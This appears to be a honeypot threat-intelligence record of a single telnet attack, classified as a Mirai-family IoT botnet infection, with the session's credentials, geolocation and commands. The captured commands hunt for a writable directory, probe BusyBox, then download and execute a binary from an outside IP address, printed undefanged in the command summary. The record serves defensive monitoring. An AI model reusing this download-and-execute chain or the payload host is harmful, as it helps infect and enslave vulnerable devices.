Attack #292127 · HoneyMire Hub

Attack #292127 telnet

Captured 2026-06-29 19:51:07Z by Ka on honeypot LU1 C3 🟡 C3 SuperMini · firmware 1.1.0.

Source119.160.215.54:37362

Target port23

Authenticatedyes

Commands11

Duration3.1s

Session recording

Loading session…

Transcript

Server output and attacker input as captured, line-grain. Malware URLs are obscured until sign-in.

mother
fucker
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4b\x4e\x57\x5a\x4c\x4f'
/bin/busybox wget;/bin/busybox echo -ne '\x4b\x4e\x57\x5a\x4c\x4f'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://124[.]129[.]163[.]69:54035/i ||curl -O hxxp://124[.]129[.]163[.]69:54035/i ||/bin/busybox wget hxxp://124[.]129[.]163[.]69:54035/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x49\x4f\x48\x59\x55\x47\x51\x5a'

Credentials

Username: mother

Password: fucker

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇵🇰Pakistan · Punjab · Gujranwala

ULTRA LINK (PRIVATE) LIMITED · AS137047 TELECOMMUNICATION AND TECHNOLOGY MASTERS (PVT.) LIMITED · 32.15,74.22

Network: residential · TELECOMMUNICATION AND TECHNOLOGY MASTERS (PVT.) LIMITED · Cable/DSL/ISP · peeringdb · medium confidence

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Matched signals:

wget/curl download
chmod/exec chain
BusyBox probing

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4b\x4e\x57\x5a\x4c\x4f'
/bin/busybox wget;/bin/busybox echo -ne '\x4b\x4e\x57\x5a\x4c\x4f'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://124.129.163.69:54035/i ||curl -O http://124.129.163.69:54035/i ||/bin/busybox wget http://124.129.163.69:54035/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x49\x4f\x48\x59\x55\x47\x51\x5a'

Reported to threat intel

AlienVault OTX ✓

HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire